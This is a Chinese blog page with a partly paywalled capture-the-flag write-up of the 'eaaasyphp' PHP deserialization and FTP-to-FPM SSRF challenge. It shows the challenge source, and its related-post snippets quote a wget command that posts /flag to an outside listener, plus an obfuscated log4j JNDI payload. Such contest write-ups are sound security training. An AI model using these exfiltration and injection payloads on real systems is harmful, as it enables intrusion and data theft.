[陇原战疫2021网络安全大赛]eaaasyphp

最新推荐文章于 2024-04-16 23:12:33 发布
原创 最新推荐文章于 2024-04-16 23:12:33 发布 · 3.2k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全 #开发语言

本文介绍了如何在PHP环境下,通过利用类的特殊行为(如__wakeup和__destruct)绕过防御,结合FTP被动模式,成功构造Payload,执行恶意代码并触发SSRF攻击。涉及的技术包括Esle和Bypass类的使用,以及FTP协议的巧妙利用。

eaaasyphp

考点: FTP 协议的被动模式攻击FPM

<?php

class Check {
   
   
    public static $str1 = false;
    public static $str2 = false;
}


class Esle {
   
   
    public function __wakeup()
    {
   
   
        Check::$str1 = true;
    }
}


class Hint {
   
   

    public function __wakeup(){
   
   
        $this->hint = "no hint";
    }

    public function __destruct(){
   
   
        if(!$this->hint){
   
   
            $this->hint = "phpinfo";
            ($this->hint)();
        }  
    }
}


class Bunny {
   
   

    public function __toString()
    {
   
   
        if (Check::$str2) {
   
   
            if(!$this->data){
   
   
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
   
   
            throw new Error("Error");
        }
    }
}

class Welcome {
   
   
    public function __invoke()
    {
   
   
        Check::
最低0.47元/天 解锁文章
2021陇原
hezhing
12-08 401
2021陇原役 可惜只做了一个密码学。还是用软件直出的。我真垃圾。赛后复盘。 参考链接 2021陇原WP - n03tAck MISC soEasyCheckin 打开是一串加密。看编码是base32加密。解码发现是e开头,后面有5位的hex加密。但这里有个没解出来。根据前后可以推测为e。替换以后hex解密。 hex解密为社会主义核心价值观,但这里有个文明的文被替换掉了。这里换回去解密。 解密得到flag: SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4} 打败
长安“役“网络安全卫士守护赛
Keepb1ue的博客
01-14 2399
文章目录Webshiro?RCE_No_ParaFlag配送中心Misc迷宫朴实无华的取证无字天书stegbinaryCryptono_cry_no_bbno_cry_no_canno_math_no_cryReversecombat_slogancute_doge Web shiro? 很明显不是一般的shiro,很多命令都不能用,又是Sprintboot框架,那可以尝试log4j RCE 发现存在WAF检测,bypass测试绕过:${${::-j}ndi:rmi://r5qm53.dnslog.cn/
陇原2021网络安全大赛 Web eaaasyphp
Sk1y的博客
12-25 3019
eaaasyphp 文章目录eaaasyphp读取phpinfo打fastcgi恶意的ftp服务构造pop链参考链接 题目给出了源码 读取phpinfo 尝试反序列化读取phpinfo 但是__wakeup()函数先于destruct函数执行,所以需要绕过:__ PHP :: Bug #81151 :: bypass __wakeup ?code=C:4:"Hint":0:{} 注意这个FPM/FastCGI 打fastcgi 使用Gopherus生成打fastcgi的payload: gopher
2021 陇原”杯 eaaasyphp wp
Sapphire037的博客
11-08 467
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
陇原2021网络安全大赛 Web CheckIN
Sk1y的博客
12-24 3374
checkin 文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接 参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-优快云博客_smb外带注入 题目有附件 下载,是个go语言,审计一下 ,文件目录如下 注意wget 还有 wget外带数据 根据上面的博客,可以执行命令wegt数据外带出来 wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/ 然后既可以得到flag
陇原2021网络安全大赛的一道web
errorr0
04-30 444
复现以前打过的比赛题
陇原2021网络安全大赛部分WP
七堇年的博客
12-24 2618
陇原""2021网络安全大赛WP
通信与网络中的简述中国4G
10-22
自从扛起了TD-SCDMA这面民族创新的大旗,TD-SCDMA是英文Time Division-Synchronous Code Division Multiple Access(时分同步码分多址) 的简称,是一种第三代无线通信的技术标准,也是ITU批准的三个3G标准中的一个...
2021-2022年收藏的精品资料食品安全监管秋季役方案.doc
09-27
收藏的精品资料
CISO的下一场役:AI与后量子密码学
最新发布
08-16
同时,书中强调了AI在网络安全中的重要作用,包括智能威胁检测、自动化响应机制等。此外,本书还涵盖了CISO在企业中的角色演变,包括如何在多变的安全环境中提供有效的领导,如何与其他IT和业务领导者协作,确保企业...
Web陇原2021网络安全大赛 题解
uuzeray的博客
04-16 708
HashMap类的作用是触发hashCode,而BadAttributeValueExpException类的作用是触发toString,看本题的源码,后续可以直接调用object.toString,上帝在关上一扇门的同时又开了一扇窗。恶意类懒得注内存马,直接打spring回显类。打入,直接回显命令执行结果,拿到flag。wget也可以外带数据,详见贴出的文章。靶机不出网,那就是打加载恶意字节码呗。/wget路由无需鉴权,可直接打。监听,反弹shell,拿flag。监听,接收到外带的数据。
陇原2021网络安全大赛Writeup
Le1a's Blog
11-08 6456
Web CheckIN 源代码的这两处: 先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了 接着尝试利用wget的--post-file进行数据外带,读取源代码 在自己VPS开个监听并且构造: /wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/ 拿到flag: flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f} Misc
陇原eaaasyphp
weixin_45751765的博客
11-24 4118
0x00 前言 比赛的时候一会写出个pop链,一发就500直接崩溃 后面才知道没有写权限也会这样(一开始以为自己????????链子写错了—) 看了师傅们的wp才知道还是自己太菜???? 知识点:FTP SSRF 打穿内网 0x01 复现 贴上源码和师傅的精简pop 学习一下别人的链子为什么写的比你好?! <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle
陇原2021网络安全大赛 bbbaby和Magic
zylxixixi的博客
11-17 427
一、bbbaby 首先对程序进行分析 ,程序较为简单,提供了修改地址内容和输入任意大小内容的功能,存在栈溢出的可能。 因为事情多,就看了眼题,最开始我想使用利用栈溢出再使用chk_stack_fail泄露出libc版本信息,虽然成功打印出libc地址但是已经退出了程序。参考了大佬陇原2021网络安全大赛-pwn-wp - LynneHuan - 博客园 , 后面的思路为首先利用提供的修改地址内容的功能,将chk_stack_fail的got地址修改为puts的plt地址,然后通过栈溢出
FPM和FTP的安全学习
unexpectedthing的博客
02-27 3205
文章目录前言前置知识什么是CGI?什么是FastCGI?web服务器,web中间件和web容器的区别浏览器处理网页的过程1.浏览器访问静态网页过程:2.浏览器访问动态页面总结FastCGI协议的分析PHP-FPMFPM任意代码执行FPM未授权访问SSRF直接对FPM/FastCGI的攻击方法一:方法二:FTP的被动模式打FPM/FastCGIFTP的前置知识FTP 协议FTP 协议的工作方式原理:演示过程FTP打FPM情况1情况2FTP打内网redisFTP打Mysql加载恶意 .so 实现 RCE 绕过
SSRF利用 Gopher 协议拓展攻击面
热门推荐
BerL1n
11-25 1万+
1 概述 Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 gophergopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是s...
SSRF--gopher协议打FastCGI
unexpectedthing的博客
11-30 6481
FastCGI 定义: 什么是CGI CGI全称"通用网关接口"(Common Gateway Interface),用于HTTP服务器与其它机器上的程序服务通信交流的一种工具,CGI程序须运行在网络服务器上。 传统CGI接口方式的主要缺点是性能较差,因为每次HTTP服务器遇到动态程序时都需要重启解析器来执行解析,然后结果被返回给HTTP服务器。这在处理高并发访问几乎是不可用的,因此就诞生了FastCGI。另外传统的CGI接口方式安全性也很差。 什么是FastCGI FastCGI是一个可伸缩地、高速地
SSRF之攻击FastCGI
weixin_50464560的博客
07-03 1356
前言 上篇文章在讲利用SSRF漏洞攻击内网的Redis的时候提到了Gopher协议,说到了这个协议作为SSRF漏洞利用中的万金油,可以用它来攻击内网的FTP、Telnet、Redis、Memcache、FastCGI等应用,那么这篇文章就来介绍一下FastCGI以及利用SSRF结合Gopher协议攻击FastCGI FastCGI 维基百科的解释:快速通用网关接口(Fast Common Gateway Interface/FastCGI)是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网
[NCTF2019]phar matches everything
as you know, nlp is fantasitc!
04-20 529
写在前面:这篇文章并没有把这道题目做出来,一直找不到内网提供PHP-FPM的主机ip,就一直卡在这个地方,目前自己的能力不够,还不能解决这道题;现在将这篇做题的记录发出来,记录学习过程,希望将来回过头来再做这道题的时候能得心应手 第一部分 phar反序列化+文件头和文件名检测绕过 buu平台上给的github源码链接失效了,直接看的wp,一个简单的pop链构造,然后利用phar反序列化 exp.php <?php class Easytest{ protected $test = '1'; }
电子商务安全现状与计算机网络安全分析
资源摘要信息:"对电子商务安全现状的看法.docx"一文深入探讨了当前电子商务领域面临的计算机网络安全问题,重点聚焦于木马病毒的爆发式增长、传播方式的演变以及由此带来的经济损失。文章指出,近年来电子商务安全...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值